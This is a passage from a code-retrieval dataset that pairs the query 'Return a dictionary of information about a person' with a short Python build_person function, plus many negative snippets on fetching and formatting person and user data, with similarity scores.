muscle_rh_activations,muscle_lh_forces,muscle_rh_forces,joint_lh_positions,joint_rh_positions = load_data()\n \n index_start = np.where(time == t_start)[0][0]\n index_end = np.where(time == t_stop)[0][0]\n \n time = time[index_start:index_end+1]\n ankle_l_trajectory = ankle_l_trajectory[index_start:index_end+1,:]\n ankle_r_trajectory = ankle_r_trajectory[index_start:index_end+1,:]\n \n #time=np.linspace(1,len(ankle_l_trajectory[:,0]),len(ankle_l_trajectory[:,0]));\n \n plt.figure('Trajectories')\n plt.subplot(311)\n plt.plot(time,ankle_l_trajectory[:,0])\n plt.plot(time,ankle_r_trajectory[:,0])\n #plt.title('Trajectory of the X component')\n plt.xlabel('Time [s]')\n plt.ylabel('X Position [cm]')\n plt.legend(['Left ankle','Right ankle'],loc='upper right')\n \n plt.subplot(312)\n plt.plot(time,ankle_l_trajectory[:,1])\n plt.plot(time,ankle_r_trajectory[:,1])\n #plt.title('Trajectory of the Y component')\n plt.xlabel('Time [s]')\n plt.ylabel('Y Position [cm]')\n plt.legend(['Left ankle','Right ankle'],loc='upper right')\n \n plt.subplot(313)\n plt.plot(time,ankle_l_trajectory[:,2])\n plt.plot(time,ankle_r_trajectory[:,2])\n #plt.title('Trajectory of the Z component')\n plt.xlabel('Time [s]')\n plt.ylabel('Z Position [cm]')\n plt.legend(['Left ankle','Right ankle'],loc='upper right')\n \n# plt.suptitle('Decomposition of the trajectories of the hind feet')\n return", "def plotForGif(s, ne, gs):\n fig, ax = plt.subplots()\n ax.set_title('time: {0}'.format(s.time))\n ax.scatter(s.carPos[:, 0] , s.carPos[:, 1], c = 'k', alpha=0.5)\n for i in range(ne):\n if (s.eventTimes[i] <= 0) and (s.eventCloseTimes[i]>=0 and (not s.eventsAnswered[i]) and (not s.eventsCanceled[i])):\n ax.scatter(s.eventPos[i, 0], s.eventPos[i, 1], c = 'b', alpha = 0.7)\n elif (s.eventsAnswered[i]):\n ax.scatter(s.eventPos[i,0], s.eventPos[i,1], c = 'g', alpha = 0.2)\n elif (s.eventsCanceled[i]):\n ax.scatter(s.eventPos[i, 0], s.eventPos[i, 1], c = 'r', alpha = 0.2)\n else:\n ax.scatter(s.eventPos[i, 0], s.eventPos[i, 1], c = 'y', alpha = 0.2)\n\n ax.set_xlim([-1, gs + 1])\n ax.set_ylim([-1, gs + 1])\n ax.grid(True)\n\n # Used to return the plot as an image rray\n fig.canvas.draw() # draw the canvas, cache the renderer\n image = np.frombuffer(fig.canvas.tostring_rgb(), dtype='uint8')\n image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n return image" ]
[ "0.59035116", "0.58859456", "0.578238", "0.5767331", "0.5742631", "0.57282263", "0.55894816", "0.5575051", "0.5565919", "0.55595213", "0.554277", "0.5542592", "0.55424595", "0.5524052", "0.5506664", "0.55034083", "0.5472254", "0.54397625", "0.54324085", "0.5425673", "0.54157317", "0.54133844", "0.5412371", "0.5399858", "0.53945", "0.538516", "0.5383022", "0.53827167", "0.53777903", "0.53697264", "0.5366976", "0.53627956", "0.5362065", "0.5360055", "0.5354667", "0.53496313", "0.5348603", "0.5345482", "0.53409696", "0.53133553", "0.53099316", "0.53067076", "0.5306027", "0.5304991", "0.52948475", "0.52939993", "0.52828676", "0.5282647", "0.5271287", "0.5266033", "0.5265542", "0.52644217", "0.5257214", "0.5251664", "0.5246394", "0.52456456", "0.5244925", "0.52431566", "0.52394", "0.5233951", "0.52264106", "0.52240163", "0.5223771", "0.521851", "0.5218214", "0.5210425", "0.5208816", "0.5205828", "0.52048224", "0.5203102", "0.5201909", "0.5192149", "0.51875097", "0.51836634", "0.51823133", "0.51823133", "0.5181849", "0.5180532", "0.517766", "0.5175277", "0.5171722", "0.5171223", "0.51702887", "0.5169149", "0.5168996", "0.5168447", "0.5165273", "0.51598805", "0.5151698", "0.5148313", "0.5141931", "0.5140935", "0.5139777", "0.51368016", "0.5134908", "0.51347786", "0.51315707", "0.51295567", "0.5129034", "0.5128166" ]
0.6715108
0
Return a dictionary of information about a person
def build_person(first_name, last_name, age=''):
    person = {
        'first': first_name.title(),
        'last': last_name.title()}
    if age:
        person['age'] = age
    return person
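# A minimal usage sketch (added for illustration; the names and printed
# dicts below are hypothetical and not part of the original dataset row):
musician = build_person('jimi', 'hendrix', age=27)
print(musician)   # {'first': 'Jimi', 'last': 'Hendrix', 'age': 27}
writer = build_person('mary', 'shelley')
print(writer)     # {'first': 'Mary', 'last': 'Shelley'} -- 'age' key omitted when empty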
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_person(self):\n person_dict = {\n 'firstname': self.__firstname,\n 'lastname': self.__lastname,\n 'height': self.__height,\n 'weight': self.__weight,\n 'age': self.__age\n }\n return person_dict", "def who_am_i():\n return {'name': 'Jonathan Martinez', 'id': '201095569', 'email': 'martijon@post.bgu.ac.il'}", "def get_person(self, url: str) -> dict:\n person = self.read_html(url)\n\n return {\n # TODO: There's a better way of doing this.\n self._columns[0]: person.select_one(\"h1\").text.strip(),\n self._columns[1]: person.select_one(\".party-membership--party\").text,\n self._columns[2]: \"; \".join(\n [a.text for a in person.select('[href^=\"tel:\"]')]\n ),\n self._columns[3]: \"; \".join(\n [a.text for a in person.select(\".email-address a\")]\n ),\n self._columns[4]: \"; \".join(\n [a.text.strip() for a in person.select(\".contact-actions__twitter\")]\n ),\n }", "def parse_person(person):\n person_name = person['name']\n person_id = person['id']\n\n pages = get_pages_from_wiki_search(person_name)\n page = select_page_like_person(pages, person)\n\n wiki_person = {\n 'id': person_id, 'fullname': person_name,\n 'url': page.get('fullurl', None), \n 'declarator_profile': page.get('declarator_profile', None),\n 'words_intersection': page.get('words_intersection', None),\n }\n\n # if page with image\n if 'pageimage' in page:\n try:\n image = page['pageimage']\n url = page['original']['source']\n license = get_license_from_wiki(image, is_file=True)\n\n photo = {'title': image, 'url': url, 'license': license}\n wiki_person['photo'] = photo\n except KeyError as e:\n message = \"person_id: %i, Not found key: %s\" % (person_id, e)\n Querylog.error(message)\n return wiki_person", "def get_user_info_by_name(self, username: str) -> dict:", "def showInfo(p,personDict):\n info1 = personDict['EnterpriseID'][p[0]]\n info2 = personDict['EnterpriseID'][p[1]]\n print (\"Person A:\",info1)\n print (\"Person B:\",info2)", "def display_person(person):\n name = person['name']\n followers = person['follower_count']\n description = person['description']\n country = person['country']\n print(f'{name}, a(n) {description}, from {country}.')\n return followers", "def get_person(self, id):\n try:\n person = Person.get(Person.id == id)\n data = model_to_dict(person)\n except DoesNotExist:\n response.status = 404\n data = \"Not found\"\n return dict(name='Person', data=data)", "def get_person_like_json(self):\n return json.dumps(self.get_person())", "def info() -> Dict[str, Any]:", "def get_info(self) -> Optional[Dict[str, Any]]:", "def current_person(self):\n d = self.people_table_data[self.row_i]\n\n # \"fullname\", \"lunaid\", \"age\", \"dob\", \"sex\", \"lastvisit\", \"maxdrop\", \"studies\",\n info = dict(zip(self.person_columns, d))\n info[\"pid\"] = d[8] # pid not shown\n\n # dont get fname and lname from table\n # could word split, but need to be accurate at least for edit module\n if self.sql:\n res = self.sql.query.get_name(pid=info[\"pid\"])\n info[\"fname\"] = res[0][0]\n info[\"lname\"] = res[0][1]\n return info\n # # main model\n # self.checkin_button.setEnabled(False)\n # print('people table: subject selected: %s' % d[8])\n # self.render_person(pid=d[8], fullname=d[0], age=d[2],\n # sex=d[4], lunaid=d[1])\n # self.render_schedule(ScheduleFrom.PERSON)", "def get_persons(self):\n response = self.do_request('/misc/user/export/json')\n if response:\n return response.json()", "def get_dictionary(self):\n data = {\n \"user_first_name\": self.user.first_name,\n \"user_last_name\": 
self.user.last_name,\n }\n dct = provider.Provider.get_dictionary(self)\n dct.update(data)\n return dct", "def _build_person_data(request):\n if hasattr(request, 'rollbar_person'):\n rollbar_person_prop = request.rollbar_person\n person = rollbar_person_prop() if callable(rollbar_person_prop) else rollbar_person_prop\n if person and isinstance(person, dict):\n return person\n else:\n return None\n\n if StarletteRequest:\n from rollbar.contrib.starlette.requests import hasuser\n else:\n def hasuser(request): return True\n\n if hasuser(request) and hasattr(request, 'user'):\n user_prop = request.user\n user = user_prop() if callable(user_prop) else user_prop\n if not user:\n return None\n elif isinstance(user, dict):\n return user\n else:\n retval = {}\n if getattr(user, 'id', None):\n retval['id'] = str(user.id)\n elif getattr(user, 'user_id', None):\n retval['id'] = str(user.user_id)\n\n # id is required, so only include username/email if we have an id\n if retval.get('id'):\n username = getattr(user, 'username', None)\n email = getattr(user, 'email', None)\n retval.update({\n 'username': username,\n 'email': email\n })\n return retval\n\n if hasattr(request, 'user_id'):\n user_id_prop = request.user_id\n user_id = user_id_prop() if callable(user_id_prop) else user_id_prop\n if not user_id:\n return None\n return {'id': str(user_id)}", "def info():\n # -------- Task 1 -------------------------\n # Please complete the following information\n\n return {\"agent name\": \"?\", # COMPLETE HERE\n \"student name\": [\"?\"], # COMPLETE HERE\n \"student number\": [\"?\"]} # COMPLETE HERE", "def get_donor_info(self):\n name = self.get_donor()\n if name in self.all_donors:\n person = self.r.hgetall(name)\n print(f\"Person: {name}\")\n for key, value in person.items():\n print(f\"{key}: {value}\")\n else:\n print(\"Name not in database.\")", "def who():\n cleanup()\n return {'available': userlist(), 'eta': data['etas'], 'etd': data['etds'], 'lastlocation': data['lastlocation'], 'ceitloch': ceitloch(), 'reminder': data['reminder']}", "def info(self) -> dict:", "def get_personal_info(self):\n self.get(\"INFO\",\"GetPersonalInfo\")\n response = self.send()\n return response", "def get_user_info_by_id(self, user_id: int) -> dict:", "def all_persons(self):\n all_persons = {}\n all_persons.update(self.staff)\n all_persons.update(self.fellows)\n return all_persons", "def get_people(self):\n url = self.base_url + 'memberships'\n\n req = requests.get(headers=self.headers, url=url)\n\n return req.json()", "def getData(self):\r\n return personData(\r\n self.title.getVal(),\r\n self.first.getVal(),\r\n self.middle.getVal(),\r\n self.last.getVal(),\r\n self.suffix.getVal(),\r\n self.phone.getVal(),\r\n self.ext.getVal(),\r\n self.email.getVal(),\r\n self.affiliation.getVal())", "def find(self, person):\n page = self.find_page(person)\n try:\n entity_id = self.get_entity_id(page.title)\n entity = self.get_entity(entity_id)\n person.dob = self.get_birthday(entity)\n person.occupation = self.get_occupation(entity)\n person.nationality = self.get_country_of_citizenship(entity)\n res_domicile = self.get_domicile(entity)\n if res_domicile:\n person.domicile = res_domicile\n elif person.nationality == self.get_birthcountry(entity):\n person.domicile = person.nationality # this is an assumption!\n birth_name = self.get_birth_name(entity)\n person.middle_name = self.get_middle_name(birth_name, person)\n if page:\n person.is_famous = 'True'\n else:\n person.is_famous = ''\n person.net_worth = self.get_networth(entity)\n 
person.description = page.summary\n person.set_raw()\n except:\n pass", "def get_author_info(self, author: str):\n for writer_word in self._writer_words:\n data = json.loads(requests.get(WIKIDATA_SEARCH + \"&srsearch=\" + author + \" \" + writer_word).text)\n pages = data.get(\"query\").get(\"search\")\n if len(pages) >= 1:\n pageid = pages[0].get(\"title\")\n author_details = self._reference.author_map.get(author)\n if author_details:\n return author_details\n if pageid == -1:\n continue\n\n else:\n response = requests.get(WIKIDATA_PARSE + pageid + \".json\")\n data = json.loads(response.text)\n if author.lower() not in data.get(\"entities\").get(pageid).get(\"labels\").get(\"en\").get(\"value\").lower():\n continue\n else:\n try:\n id = data.get(\"entities\").get(pageid).get(\"claims\").get(\"P31\")[0].get(\"mainsnak\").get(\"datavalue\").get(\"value\").get(\"id\")\n if str(id) != \"Q5\": # the id for human\n continue\n except IndexError:\n continue\n properties = data.get(\"entities\").get(pageid).get(\"claims\")\n author_details = {\"id\": pageid, \"gender\": self.get_gender(properties)}\n country_details = self.get_country(properties)\n author_details[\"country\"] = country_details\n self._reference.author_map[author] = author_details\n return author_details\n return {\"id\": \"Unknown\", \"gender\": \"Unknown\", \"country\": [{\"name\": \"Unknown\", \"region\": \"Unknown\"}]}", "def get_persons(self):\n response = self.do_request('/management/persons/export/json/')\n if response:\n return response.json()", "def get_details_for_email(email):\n try:\n result = dict(clearbit.Enrichment.find(email=email, stream=True))\n except HTTPError as e:\n logging.info('Skipping clearbit.com services. REASON %s', str(e))\n\n return {}\n\n return {\n 'first_name': result.get('person', {}).get('name', {}).get('givenName') or '',\n 'last_name': result.get('person', {}).get('name', {}).get('familyName') or '',\n 'gender': result.get('person', {}).get('gender') or '',\n 'bio': result.get('person', {}).get('bio') or ''\n }", "def fetch_extra_data(resource):\n person_id = resource.get(\"cern_person_id\")\n return dict(person_id=person_id)", "def get_contact_info(self):\n outputDict = {\"USERNAME\": consts.USERNAME,\n \"IP\": consts.IPADDRESS, \n \"MACHINE\": consts.HOSTNAME, \n \"EMAIL\": 'ckenne24@student.scad.edu', \n \"PHONE\": '203-722-6620'} # ::: TO DO::: dynamically get phone and email info automatically\n return outputDict", "def get_info_dict(self):\n return {\n 'bidi': self.bidi,\n 'code': self.code,\n 'name': self.name,\n 'name_local': self.name_local\n }", "def seat_profile(first_name, last_name, **passenger_info):\n\tprofile = {}\n\tprofile['first_name'] = first\n\tprofile['last_name'] = last\n\tfor key, value in passenger_info.items():\n\t\tprofile[key] = value\n\treturn profile", "def get_person(self, requestId):\n return self.get_json('/verification/%s/person' % str(requestId))", "def describe(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'age': calculate_current_age(self.birth_date),\n 'gender': self.gender,\n 'filmography': [appearance.movies.title for appearance in\n Appearance.query.filter(Appearance.actor_id == self.id).all()]\n }", "def infos(self):\r\n\t\tname = name\r\n\t\tlast_name = last_name", "def build_person(first_name, last_name, age=''):\r\n person = {'first':first_name, 'last':last_name}\r\n if age:\r\n person['age'] = age\r\n return person", "def to_dict(self) -> dict:\n return {\n 'author_id': self.id,\n 'fullname': self.fullname\n }", "def 
extract_user_info(user):\r\n return {\r\n 'username': user.username,\r\n 'email': user.email,\r\n 'first_name': user.first_name,\r\n 'last_name': user.last_name,\r\n }", "def extract_user_info(user):\r\n return {\r\n 'username': user.username,\r\n 'email': user.email,\r\n 'first_name': user.first_name,\r\n 'last_name': user.last_name,\r\n }", "def select_person():\r\n body = request.get_json()\r\n\r\n try:\r\n SELECT_PERSON_SCHEMA.validate(body)\r\n except SchemaError as err:\r\n raise ServiceBodyError(str(err))\r\n\r\n with sqlite_client:\r\n message = get_person(sqlite_client, body.get('id'))\r\n\r\n return jsonify({'name': message[0][1], 'cpf': message[0][2]})", "def get_person(request):\n\n email = request.args.get(\"email\", None, str)\n # log_info(\"email is \" + email)\n\n if not email:\n log_info(\"get_person was called, but no email was provided in request\")\n return None\n\n if validators.email(email) and (email_requester := auth.check_teacher(request)):\n if email_requester and validators.email(email_requester):\n db = database.Database()\n student = db.get_student(email)\n return dict(student)\n\n elif validators.email(email) and (email_requester := auth.check_login(request)):\n if email_requester and validators.email(email_requester) and email == email_requester:\n db = database.Database()\n student = db.get_student(email)\n if 'notes' in student:\n del student['notes']\n\n return dict(student)\n\n log_info(\"No person with email \" + email + \" found in database\")\n return None", "def user_data(self, access_token, *args, **kwargs):\n fields_selectors = ','.join(set(['id', 'first-name', 'last-name'] +\n self.setting('FIELD_SELECTORS', [])))\n # use set() over fields_selectors since LinkedIn fails when values are\n # duplicated\n url = 'https://api.linkedin.com/v1/people/~:(%s)' % fields_selectors\n raw_xml = self.oauth_request(access_token, url).content\n try:\n return to_dict(ElementTree.fromstring(raw_xml))\n except (ExpatError, KeyError, IndexError):\n return None", "def _to_dict(self):\n\t\treturn {'id': self.id,\n\t\t\t\t'name': self.name,\n\t\t\t\t'surname': self.surname}", "def get_user_details(self, response):\n name = response.get(\"name\")\n return {\n \"username\": str(response.get(\"account_id\")),\n \"email\": response.get(\"email\"),\n \"fullname\": name.get(\"display_name\"),\n \"first_name\": name.get(\"given_name\"),\n \"last_name\": name.get(\"surname\"),\n }", "def build_person(first_name, last_name, middle_name='', age=None): \n person = {'first': first_name, 'middle': middle_name, 'last': last_name}\n if age:\n person['age'] = age\n return person", "def seat_profile(first, last, **passenger_info):\n profile = {}\n profile['first_name'] = first\n profile['last_name'] = last\n for key, value in passenger_info.items():\n profile[key] = value\n return profile", "def info():\n if g.party_id is None:\n # No party is configured for the current site.\n abort(404)\n\n party = party_service.get_party(g.party_id)\n\n return {\n 'party': party,\n }", "def get_persons():\n resp = requests.get(API_URL).content\n persons = json.loads(resp)\n return persons", "def seat_profile(first, last, **passenger_info):\n\tprofile = {}\n\tprofile['first_name'] = first\n\tprofile['last_name'] = last\n\tfor key, value in passenger_info.items():\n\t\tprofile[key] = value\n\treturn profile", "def identify_user(picture: str) -> Optional[dict]:\n data = api.identify_person_api(picture)\n return data.json()", "def __getstate__(self):\n\n # Get data in long format\n long = 
self.long_format()\n return {\"date\": self.date,\n \"persons\": long\n }", "def get_info(self):\n return {}", "def get_user_details(self, response):\n fullname, first_name, last_name = self.get_user_names(\n response.get(\"fullName\"),\n response.get(\"firstName\"),\n response.get(\"lastName\"),\n )\n return {\n \"username\": response.get(\"username\"),\n \"email\": response.get(\"email\") or \"\",\n \"fullname\": fullname,\n \"first_name\": first_name,\n \"last_name\": last_name,\n }", "def build_person(first_name, last_name, age=''):\n person = {'first': first_name, 'last': last_name}\n if age:\n person['age'] = age\n return person", "def build_person(first_name, last_name, age=''):\n person = {'first': first_name, 'last': last_name}\n if age:\n person['age'] = age\n return person", "def enumerate_person(hf=0.5, age=(18, 60), n=100):\n for i in range(n):\n hfi = random.random() <= hf\n agei = random.randint(*age)\n namei = first_names[hfi]\n yield dict(gender=(1 if hfi else 0), age=agei, name=namei, idc=uuid.uuid4())", "def person_object_factory():\n person = {\n 'lastName': rl_fake().last_name(),\n 'gender': random.choice(('M', 'F'))\n }\n\n # Make the person's name match their gender.\n person['firstName'] = rl_fake().first_name_male() if person['gender'] == 'M' else rl_fake().first_name_female()\n\n # These are all optional in the DB. Over time, we'll try all possibilities.\n if flip():\n person['birthday'] = rl_fake().date_of_birth(minimum_age=18).strftime('%Y-%m-%d')\n if flip():\n person['phone'] = rl_fake().phone_number()\n if flip():\n person['email'] = rl_fake().email()\n return person", "def get_profile_info(self):\n\n drill_path = str(Path.home())+\"/Documents/ball_e_profiles/drill_profiles/{drill_name}/{drill_name}.csv\".format(\n drill_name=self.drill_name)\n with open(drill_path) as file:\n csv_reader = csv.reader(file, delimiter=',')\n row_count = 0\n info_dict = dict()\n for row in csv_reader:\n if row_count == 0:\n row_count += 1\n else:\n info_dict[row[0]] = [row[1], row[2], row[3]]\n row_count += 1\n\n return info_dict", "def to_cff_person(person: pybtex.database.Person) -> dict:\n # Map BibTeX to CFF fields\n name_fields = {\n \"last\": \"family-names\",\n \"bibtex_first\": \"given-names\",\n \"prelast\": \"name-particle\",\n \"lineage\": \"name-suffix\",\n }\n result = {\n cff_field: \" \".join(person.get_part(bibtex_field))\n for bibtex_field, cff_field in name_fields.items()\n if person.get_part(bibtex_field)\n }\n # Use CFF \"entity\" format if BibTex has no first & last names\n if list(result.keys()) == [\"family-names\"]:\n return {\"name\": result[\"family-names\"]}\n return result", "def get_author_info_from_people_collection(info):\n # TODO: probably we will need to extract this somewhere else\n URL = ('https://cds.cern.ch/submit/get_authors?'\n 'query={0}&relative_curdir=cdslabs%2Fvideos')\n if '0' in info or not info.get('a'):\n # There is already enough information or we don't have a name to query\n return info\n author_name = info.get('a')\n if PY2:\n # In Python 3, encoded name will change type to bytes and this will\n # cause query to CDS to fail\n author_name = author_name.encode('utf-8')\n author_info = _get_http_request(url=URL.format(author_name), retry=10)\n if not author_info or len(author_info) > 1:\n # Didn't find anything or find to many matches\n return info\n\n # Prepare author name\n author_info = author_info[0]\n if 'name' not in author_info:\n author_info['name'] = '{0}, {1}'.format(author_info['lastname'],\n author_info['firstname'])\n 
return MementoDict([\n (k, v) for k, v in chain(info.items(), iteritems(author_info))])", "def get_user_details(self, response):\n first_name, last_name = response['first-name'], response['last-name']\n email = response.get('email-address', '')\n return {'username': first_name + last_name,\n 'fullname': first_name + ' ' + last_name,\n 'first_name': first_name,\n 'last_name': last_name,\n 'email': email}", "def getInfo():", "def show_all_information(self):\n return self.__dict__\n # print(self.first_name)\n # print(self.last_name)\n # print(self.age)\n # print(self.name)\n # print(self.gender)\n # print(self.number_of_children)", "def _get_userinfo(self):\n if not hasattr(self, \"_userinfo\"):\n self._userinfo = {\n \"name\" : self.user_name,\n \"email\" : self.user_email\n }\n if self.user_id:\n u = self.user\n if u.email:\n self._userinfo[\"email\"] = u.email\n\n # If the user has a full name, use that for the user name.\n # However, a given user_name overrides the raw user.username,\n # so only use that if this review has no associated name.\n if u.get_full_name():\n self._userinfo[\"name\"] = self.user.get_full_name()\n elif not self.user_name:\n self._userinfo[\"name\"] = u.username\n return self._userinfo", "def who_handler(self, data, suffix=''):\n # Just to show data coming in...\n assert data['requested'] == 'name'\n\n return {\n 'name': self.get_current_user_full_name(),\n 'email': self.get_current_user_emails()\n }", "def parse_person(person):\n parsed = person_parser(person)\n if not parsed:\n parsed = person_parser_only_name(person)\n name = parsed.group('name')\n email = None\n else:\n name = parsed.group('name')\n email = parsed.group('email')\n\n return name, email", "def get_user_details(self, response):\n values = {\n 'username': unquote(response['nick']),\n 'email': unquote(response['email']),\n 'first_name': unquote(response['first_name']),\n 'last_name': unquote(response['last_name'])\n }\n\n if values['first_name'] and values['last_name']:\n values['fullname'] = '%s %s' % (values['first_name'],\n values['last_name'])\n return values", "def dictify(self):\n return {\n \"name\" : self.name,\n \"lastname\" : self.lastname,\n \"phone\" : self.phone,\n \"email\" : self.email\n }", "def __repr__(self):\r\n return {'name':self.name, 'weight':self.organ_weight_grams, 'vital organ': self.vital_organ, 'organ system': self.organ_system}", "def info(self):\n return f\"{self.get_first_name}, {self.get_last_name}. {self.get_age} y.o. 
#{self.get_id_number}\"", "def get_user_details(self, response):\n\n return {\n 'email': response.get('email'),\n 'id': response.get('id'),\n 'full_name': response.get('name')\n }", "def to_dict(self):\n return {\n \"id\":self.id,\n \"username\":self.email,\n \"email\":self.email,\n \"firstname\":self.firstname,\n \"lastname\":self.lastname\n }", "def get_people(team):", "def get_person_name(self, person_id):\n res = requests.get(url=\"https://api.ciscospark.com/v1/people/{}\".format(person_id),\n headers=self.headers)\n\n try:\n class person(object):\n firstName = res.json()['firstName']\n lastName = res.json()['lastName']\n\n return person\n except AttributeError as e:\n print(res.text)\n return None", "def _to_dict(self):\n\t\tauthor = Author.query.get(self.authors_id)\n\t\treturn {'id': self.id,\n\t\t\t\t'name': self.name,\n\t\t\t\t'author_id': self.authors_id,\n\t\t\t\t'author_name': author.name,\n\t\t\t\t'author_surname': author.surname}", "def user_info(username):\n print(json.dumps(client.user_info(username)))", "def format_person(adj, dict):\n name = dict['name']\n net = int(dict['net_worth (USD)'])\n return \"The {0} person is {1}. They have a net worth of ${2:,}\".format(adj, name, net)", "def details(self):\n details = ProfileDetailsParser(self.details_string())\n\n return dict(\n follows=details.follows(),\n favorites=details.favorites(),\n rating=details.rating(),\n language=details.language(),\n genres=details.genres(),\n characters=details.characters(),\n )", "def user_info(self):\n response = self.query('user_info')\n return response", "def get_pers_trans(lang: Lang) -> dict:\n return read_json(f'languages/{lang}/persons')", "def get_person(self, user_id):\n endpoint = '/user/{}'.format(user_id)\n return self.get_request(endpoint)", "def show_result(self, person):\n myopps = {}\n for entry in self.result.keys():\n if person in entry:\n parts = entry.split(':')\n if person == parts[0]:\n opp = parts[1]\n else:\n opp = parts[0]\n myopps[opp] = self.result[entry]\n slist = list(myopps.items())\n return sorted(slist, key=lambda x: x[1][1], reverse=True)", "def getInfo(self):\n request = self._connection.get('bookmarklet')\n userdata = self._userinfo_regex.search(request.text)\n if userdata is None: userdata = self._userinfo_regex_2.search(request.text)\n if userdata is None: raise errors.DiaspyError('cannot find user data')\n userdata = userdata.group(1)\n return json.loads(userdata)", "def person(self, person_id):\r\n return persons.Person(self, person_id)", "def get_people_urls(gedcom_data, apid_full_map):\n people = {}\n found = False\n logging.info(\"Extracting person specific URL information\")\n for line in gedcom_data.split(\"\\n\"):\n if len(line) > 5:\n tag = line.split(\" \")[1]\n if \"@P\" in tag:\n person = tag\n found = False\n continue\n if tag == \"_APID\" and not found:\n apid = line.split(\" \")[2]\n if apid in apid_full_map:\n if \"person_url\" in apid_full_map[apid]:\n if apid_full_map[apid][\"person_url\"] != \"\":\n people.update({person: apid_full_map[apid][\"person_url\"]})\n found = True\n logging.info(\"Person URL extraction completed\")\n return people", "def get_personal_info(line_objs):\n result = []\n start = True\n for line in line_objs:\n line_label = line.get('label')\n line_category = line.get('category')\n if line_label == 'title':\n if line_category == 'personal_info':\n start = True\n continue\n else:\n start = False\n if start:\n result.append(line)\n try:\n max_height = max([line.get('wh')[1] for line in result])\n except:\n max_height = 
max([line.get('wh')[1] for line in line_objs])\n track_candicate_name = False\n for line in result:\n height = line.get('wh')[1]\n if height == max_height and not track_candicate_name:\n for word in profile_words.keys():\n if word in line.get(\"text\"):\n continue\n line['label'] = 'candicate_name'\n track_candicate_name = True\n else:\n line['label'] = 'description'\n line['category'] = 'personal_info'\n return result", "def car_info(manufacturer, model_name, **other_info):\r\n car_Profile = {}\r\n car_Profile['manufacturer'] = manufacturer.title()\r\n car_Profile['model'] = model_name.title()\r\n for key, value in other_info.items():\r\n car_Profile[key] = value\r\n return car_Profile", "def read_person(person_id):\n try:\n conn = sqlite3.connect(settings.database_name)\n conn.row_factory = sqlite3.Row\n c = conn.cursor()\n c.execute(\"PRAGMA foreign_keys = ON\")\n c.execute(\"SELECT * FROM person WHERE personid =?\", (person_id,))\n _person = None\n for row in c:\n _person = Person()\n _person.person_id = row[\"personid\"]\n _person.first_name = row[\"firstname\"]\n _person.last_name = row[\"lastname\"]\n _person.middle_initial = row[\"middleinitial\"]\n _person.nick_name = row[\"nickname\"]\n _person.date_of_birth = row[\"dateofbirth\"]\n _person.date_of_death = row[\"dateofdeath\"]\n conn.close()\n return _person\n except:\n return None", "def get_personal_info(self, table):\n json_result = {}\n row_list = table.xpath('./tr[position() > 1]')\n for row in row_list:\n row_key = row.xpath('./td[1]/b/text()')\n if row_key:\n row_key = row_key[0]\n else:\n raise ProfileException(\"Failed to get key of personal info\")\n row_value = row.xpath('./td[2]/text()')\n if (len(row_value) != 0) & hasattr(row_value[0], 'strip'):\n row_value = row_value[0].strip()\n else:\n raise ProfileException(\"Failed to get value of personal info\")\n json_result.update({row_key: row_value})\n if json_result:\n return json_result\n else:\n raise ProfileException(\"Failed to get personal info table(row list is empty)\")", "def get_person_info(self, link: str) -> dict:\n self.driver.get(link)\n person_info = {}\n # Get person name\n person_info[\"ФИО\"] = self.driver.find_element_by_xpath('//h1[@data-shmid=\"profilePrepName\"]').text\n # Get education info\n personal_block = self.driver.find_element_by_xpath(\"//div[@class='_2iQ3do3']\")\n if(\"Образование\" in personal_block.text):\n try:\n edu = self.driver.find_element_by_xpath(\"//div[@class='ui-text _3fhTO7m _3xKhc83 _2iyzK60 _1A6uUTD']\")\n # Удаление лишних элементов \n waste = self.driver.find_element_by_xpath(\"//span[@class='ui-text _TE8l15y _3xKhc83 _38NyyC- _32776-7']\")\n edu = edu.text.replace(waste.text, '')\n person_info[\"Образование\"] = re.split(r\"[,;]\", edu)[0]\n except:\n pass\n # Get tution experience\n personal_block = personal_block.find_elements_by_tag_name('div')\n for block in enumerate(personal_block):\n text = block[1].text\n index = text.find('(')\n try:\n if((\"Репетиторский опыт\" in text) or (\"Опыт репетиторства\" in text)): \n if(index != -1):\n years = text[index+1:index+3]\n person_info[\"Репетиторский опыт (лет)\"] = int(years)\n else:\n years = re.split(r\"[(гл–]\", text)\n person_info[\"Репетиторский опыт (лет)\"] = int(years[1])\n break;\n elif (text.find(\"Репетиторская деятельность\") != -1):\n if(index != -1):\n years = text[index+1:index+3]\n person_info[\"Репетиторский опыт (лет)\"] = int(years)\n else:\n years = re.split(r\"[(гл–]\", text)\n person_info[\"Репетиторский опыт (лет)\"] = int(years[2])\n break;\n 
except:\n pass\n # Get working methods\n methods_block = self.driver.find_element_by_xpath(\"//div[@class='_3z3XSoj']\")\n if(\"Работает дистанционно\" in methods_block.text):\n person_info[\"Работает дистанционно\"] = \"+\"\n if(\"Принимает у себя\" in methods_block.text):\n person_info[\"Принимает у себя\"] = \"+\"\n if(\"Выезд к клиенту\" in methods_block.text):\n person_info[\"Выезд к клиенту\"] = \"+\"\n # Get reviews\n reviews_block = self.driver.find_element_by_xpath('//div[@data-shmid=\"ProfileTabsBlock_bar\"]')\n reviews = reviews_block.find_elements_by_tag_name('span')\n person_info[\"Количество оценок\"] = int(reviews[0].text)\n if person_info[\"Количество оценок\"] == 0:\n person_info[\"Средняя оценка\"] = 0\n for i, rate in enumerate(self.rate_list):\n person_info[self.rate_list[i]] = 0\n else:\n try:\n person_info[\"Средняя оценка\"] = float(reviews[1].text.replace(',', '.'))\n reviews_rates = self.driver.find_element_by_xpath('//div[@data-shmid=\"ReviewHistogramComponent\"]')\n reviews_rates = reviews_rates.find_element_by_xpath('//div[@class=\"_2ZifqNc\"]') \\\n .find_elements_by_tag_name('div')\n for i, review in enumerate(reviews_rates):\n person_info[self.rate_list[i]] = int(review.text)\n except:\n pass\n\n # Get all services and prices\n try:\n price_button = self.driver.find_element_by_xpath('//a[@data-shmid=\"pricesMore\"]')\n price_button.click()\n except:\n pass\n prices = self.driver.find_elements_by_xpath('//tr[@data-shmid=\"priceRow\"]')\n for price in prices:\n columns = price.find_elements_by_tag_name('td')\n if columns[0].text:\n subj = columns[0].text.split(\"\\n\")[0].strip(\".\") + \" (₽/60 мин.)\"\n price = columns[1].text.split(\"₽\")[0]\n person_info[subj] = price\n return person_info", "def rootuser_info(self, datadict):\n\n dict1 = OrderedDict()\n dict1 = datadict['entry_data']['ProfilePage'][0]['graphql']['user']\n\n userdict = 